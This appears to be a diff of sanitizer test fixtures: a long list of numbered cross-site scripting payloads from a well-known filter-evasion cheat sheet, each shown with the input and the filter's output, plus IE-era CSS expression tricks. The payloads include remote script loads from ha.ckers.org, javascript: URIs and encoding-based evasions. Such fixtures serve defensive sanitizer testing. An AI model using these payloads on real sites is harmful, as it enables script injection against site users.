<img src="denied:java script:alert('xss');" alt="image" /><br />
|
||||||
|
<img src="denied:javascript:alert('XSS')" alt="image" /><br />
|
||||||
|
<span style="color: #FF6699'onmouseover='alert(1)//;">test</span>
|
||||||
|
<span style="color: img//onerror='alert`www.ptsecurity.com`'src=Psych0tr1a;">
|
||||||
|
<div style="javascript:alert('xss');"></div><br />
|
||||||
|
<div style="background-image:url(denied:javascript:alert('xss'));"></div><br />
|
||||||
|
<div style="background-image:url("denied:javascript:alert('xss')" );"></div><br />
|
||||||
|
<!--[if gte IE 4]><script>alert('xss');</script><![endif]--><br />
|
||||||
|
<script a=">" src="http://ha.ckers.org/xss.js"></script><br />
|
||||||
|
<div style="background-image: url('denied:js:xss')"></div><br />
|
||||||
|
<a style=";-moz-binding:url(denied:http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert %28%27xss%3f%29%29">x</a><br />
|
||||||
|
<strong>Opera:</strong> <a href="denied:\xE2\x80\x83javascript:alert(123)">link</a>
|
||||||
|
<strong>Bad IE7:</strong> <a style="color:expr comment*/ession(alert(document.domain))">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: x */ (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ */ (alert('xss'));">xxx</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="x" style="width: *** *;;;;;;*/ */(alert('xss'));">x</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background: */ (alert('xss'));">x</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="x" style="background: huh */ */ (alert('xss'));">x</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a href="x" style="background: */ (alert('xss'));background: */ (alert('xss'));">x</a><br />
|
||||||
|
<strong>Bad IE7:</strong> exp/*<a style="no ss:noxss("*/ ");xss:ex XSS*/ /pression(alert("XSS"))">x</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a style="color: 065 078 070 072 065 073 073 069 06f 06e 028 061 06c 065 072 074 028 031 029 029">test</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a style="xss:e #48;078pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
|
||||||
|
<strong>Bad IE7:</strong> <a style="background:url('denied:java script:eval(document.all.mycode.expr)')">hi</a><br />
|
||||||
|
|
||||||
|
<h6>Other</h6>
|
||||||
|
|
||||||
|
3 < 4 <br />
|
||||||
|
3 > 4 <br />
|
||||||
|
> 3 <br />
|
||||||
|
<._.> hi! <br />
|
||||||
|
<<< ALERT >>> <br />
|
||||||
|
<![if !vml]> some stuff <![endif]> <br />
|
||||||
|
<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /> <br />
|
||||||
|
<uml:ns ns = "urn:www"> <br />
|
||||||
|
<uml:ns ns = 'urn:www'> <br />
|
||||||
|
if(13<age AND 21>age){say 'teen'} <br />
|
||||||
|
age >51 and a smoking history of >51 pack-years <b>was</b> <br />
|
||||||
|
age > 51 and a smoking history of >51 pack-years <b>was</b> <br />
|
||||||
|
age <51 and a smoking history of <51 pack-years <b>was</b> <br />
|
||||||
|
age < 51 and a smoking history of < 51 pack-years <b>was</b> <br />
|
||||||
|
<b>age >51 and a smoking history of >51 pack-years</b> <br />
|
||||||
|
<b>age > 51 and a smoking history of >51 pack-years</b> <br />
|
||||||
|
<b>age <51 and a smoking history of <51 pack-years</b> <br />
|
||||||
|
<b>age < 51 and a smoking history of < 51 pack-years</b> <br />
|
||||||
|
</b></span>
|
|
@ -0,0 +1,642 @@
|
||||||
|
1. XSS Locator
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||||
|
|
||||||
|
2. XSS Quick Test
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
'';!--"<XSS>=&{()}
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
'';!--"<XSS>=&{()}
|
||||||
|
|
||||||
|
3. SCRIPT w/Alert()
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT>alert('XSS')</SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT>alert('XSS')</SCRIPT>
|
||||||
|
|
||||||
|
4. SCRIPT w/Source File
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||||
|
|
||||||
|
5. SCRIPT w/Char Code
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||||
|
|
||||||
|
6. DIV background-image 1
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<div style="background-image: url(denied:javascript:alert('XSS'))"></div>
|
||||||
|
|
||||||
|
7. DIV background-image 2
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<div style="background-image: url(denied:&#1;javascript:alert('XSS'))"></div>
|
||||||
|
|
||||||
|
8. DIV expression
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<DIV STYLE="width: expression(alert('XSS'));">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<div style="width: (alert('XSS'));"></div>
|
||||||
|
|
||||||
|
9. IFRAME
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||||
|
|
||||||
|
10. INPUT Image
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<input type="image" src="denied:javascript:alert('XSS');" />
|
||||||
|
|
||||||
|
11. IMG w/JavaScript Directive
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="javascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:javascript:alert('XSS');" alt="image" />
|
||||||
|
|
||||||
|
12. IMG No Quotes/Semicolon
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:javascript:alert(" alt="image" />
|
||||||
|
|
||||||
|
13. IMG Dynsrc
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG DYNSRC="javascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="src" alt="image" />
|
||||||
|
|
||||||
|
14. IMG Lowsrc
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG LOWSRC="javascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="src" alt="image" />
|
||||||
|
|
||||||
|
15. IMG Embedded commands 1
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" alt="image" />
|
||||||
|
|
||||||
|
16. IMG Embedded commands 2
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
||||||
|
|
||||||
|
17. IMG STYLE w/expression
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
||||||
|
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
||||||
|
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
||||||
|
|
||||||
|
18. IMG w/VBscript
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:vbscript:msgbox("XSS")" alt="image" />
|
||||||
|
|
||||||
|
19. LAYER
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||||
|
|
||||||
|
20. Livescript
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="livescript:[code]">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:livescript:[code]" alt="image" />
|
||||||
|
|
||||||
|
21. US-ASCII encoding
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
|
||||||
|
|
||||||
|
22. Mocha
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="mocha:[code]">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:mocha:[code]" alt="image" />
|
||||||
|
|
||||||
|
23. OBJECT
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||||
|
|
||||||
|
24. OBJECT w/Embedded XSS
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name="url" value="javascript:alert(" /></OBJECT>
|
||||||
|
|
||||||
|
25. Embed Flash
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
||||||
|
|
||||||
|
26. OBJECT w/Flash 2
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";
|
||||||
|
eval(a+b+c+d);
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";
|
||||||
|
eval(a+b+c+d);
|
||||||
|
|
||||||
|
27. STYLE
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||||
|
|
||||||
|
28. STYLE w/Comment
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img style="xss:expr XSS*/ession(alert('XSS'))" src="src" alt="image" />
|
||||||
|
|
||||||
|
29. STYLE w/Anonymous HTML
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||||
|
|
||||||
|
30. TABLE
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<table></table>
|
||||||
|
|
||||||
|
31. TD
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<table><td></td></table>
|
||||||
|
|
||||||
|
32. XML namespace
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<HTML xmlns:xss>
|
||||||
|
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
|
||||||
|
<xss:xss>XSS</xss:xss>
|
||||||
|
</HTML>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<HTML xmlns:xss>
|
||||||
|
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
|
||||||
|
<xss:xss>XSS</xss:xss>
|
||||||
|
</HTML>
|
||||||
|
|
||||||
|
33. XML data island w/CDATA
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
||||||
|
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
||||||
|
</C></X></xml><span></span>
|
||||||
|
|
||||||
|
34. XML data island w/comment
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
|
||||||
|
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<XML ID="xss"><i><b><img src="src" alt="image" />cript:alert('XSS')"></b></i></XML>
|
||||||
|
<span></span>
|
||||||
|
|
||||||
|
35. XML (locally hosted)
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
||||||
|
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
||||||
|
<span></span>
|
||||||
|
|
||||||
|
36. XML HTML+TIME
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<HTML><BODY>
|
||||||
|
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
|
||||||
|
<?import namespace="t" implementation="#default#time2">
|
||||||
|
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<HTML><BODY>
|
||||||
|
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
|
||||||
|
<?import namespace="t" implementation="#default#time2">
|
||||||
|
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
|
||||||
|
|
||||||
|
37. Commented-out Block
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<!--[if gte IE 4]>
|
||||||
|
<SCRIPT>alert('XSS');</SCRIPT>
|
||||||
|
<![endif]-->
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<!--[if gte IE 4]>
|
||||||
|
<SCRIPT>alert('XSS');</SCRIPT>
|
||||||
|
<![endif]-->
|
||||||
|
|
||||||
|
38. Rename .js to .jpg
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||||
|
|
||||||
|
39. SSI
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||||
|
|
||||||
|
40. PHP
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<? echo('<SCR)';
|
||||||
|
echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<? echo('<SCR)';
|
||||||
|
echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
||||||
|
|
||||||
|
41. JavaScript Includes
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<BR SIZE="&{alert('XSS')}">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<br />
|
||||||
|
|
||||||
|
42. Case Insensitive
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:JaVaScRiPt:alert(" alt="image" />
|
||||||
|
|
||||||
|
43. HTML Entities
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=javascript:alert("XSS")>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:javascript:alert("XSS")" alt="image" />
|
||||||
|
|
||||||
|
44. Grave Accents
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:`javascript:alert(" alt="image" />
|
||||||
|
|
||||||
|
45. Image w/CharCode
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:javascript:alert(String.fromCharCode(88,83,83))" alt="image" />
|
||||||
|
|
||||||
|
46. UTF-8 Unicode Encoding
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:javascript:alert('XSS')" alt="image" />
|
||||||
|
|
||||||
|
47. Long UTF-8 Unicode w/out Semicolons
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041" alt="image" />
|
||||||
|
|
||||||
|
48. DIV w/Unicode
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<div style="background-image: 075 072 06C 028' 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029' 029"></div>
|
||||||
|
|
||||||
|
49. Hex Encoding w/out Semicolons
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29" alt="image" />
|
||||||
|
|
||||||
|
50. Embedded Tab
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="jav ascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:jav ascript:alert('XSS');" alt="image" />
|
||||||
|
|
||||||
|
51. Embedded Encoded Tab
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="jav	ascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:jav	ascript:alert('XSS');" alt="image" />
|
||||||
|
|
||||||
|
52. Embedded Newline
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:jav
ascript:alert('XSS');" alt="image" />
|
||||||
|
|
||||||
|
53. Embedded Carriage Return
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:jav
ascript:alert('XSS');" alt="image" />
|
||||||
|
|
||||||
|
54. Multiline w/Carriage Returns
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG
|
||||||
|
SRC
|
||||||
|
=
|
||||||
|
"
|
||||||
|
j
|
||||||
|
a
|
||||||
|
v
|
||||||
|
a
|
||||||
|
s
|
||||||
|
c
|
||||||
|
r
|
||||||
|
i
|
||||||
|
p
|
||||||
|
t
|
||||||
|
:
|
||||||
|
a
|
||||||
|
l
|
||||||
|
e
|
||||||
|
r
|
||||||
|
t
|
||||||
|
(
|
||||||
|
'
|
||||||
|
X
|
||||||
|
S
|
||||||
|
S
|
||||||
|
'
|
||||||
|
)
|
||||||
|
"
|
||||||
|
>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:j a v a s c r i p t : a l e r t ( ' X S S ' )" alt="image" />
|
||||||
|
|
||||||
|
55. Spaces/Meta Chars
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="  javascript:alert('XSS');">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="denied:&#14; javascript:alert('XSS');" alt="image" />
|
||||||
|
|
||||||
|
56. Non-Alpha/Non-Digit
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
57. Non-Alpha/Non-Digit Part 2
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||||
|
|
||||||
|
58. No Closing Script Tag
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js
|
||||||
|
|
||||||
|
59. Protocol resolution in script tags
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT SRC=//ha.ckers.org/.j>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT SRC=//ha.ckers.org/.j>
|
||||||
|
|
||||||
|
60. Half-Open HTML/JavaScript
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG SRC="javascript:alert('XSS')"
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<IMG SRC="javascript:alert('XSS')"
|
||||||
|
|
||||||
|
61. Double open angle brackets
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
|
||||||
|
|
||||||
|
62. Extraneous Open Brackets
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||||
|
|
||||||
|
63. Malformed IMG Tags
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<img src="src" alt="image" /><SCRIPT>alert("XSS")</SCRIPT>">
|
||||||
|
|
||||||
|
64. No Quotes/Semicolons
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT>a=/XSS/
|
||||||
|
alert(a.source)</SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT>a=/XSS/
|
||||||
|
alert(a.source)</SCRIPT>
|
||||||
|
|
||||||
|
65. Evade Regex Filter 1
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
66. Evade Regex Filter 2
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
67. Evade Regex Filter 3
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
68. Evade Regex Filter 4
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
69. Evade Regex Filter 5
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
70. Filter Evasion 1
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
71. Filter Evasion 2
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
|
||||||
|
72. Mixed Encoding
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<A HREF="h
|
||||||
|
tt p://6	6.000146.0x7.147/">XSS</A>
|
||||||
|
|
||||||
|
Output code »
|
||||||
|
<a href="denied:h tt p://6	6.000146.0x7.147/">XSS</a>
|
||||||
|
|
||||||
|
73. JavaScript Link Location
|
||||||
|
|
||||||
|
Input code »
|
||||||
|
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
|
||||||
|
|
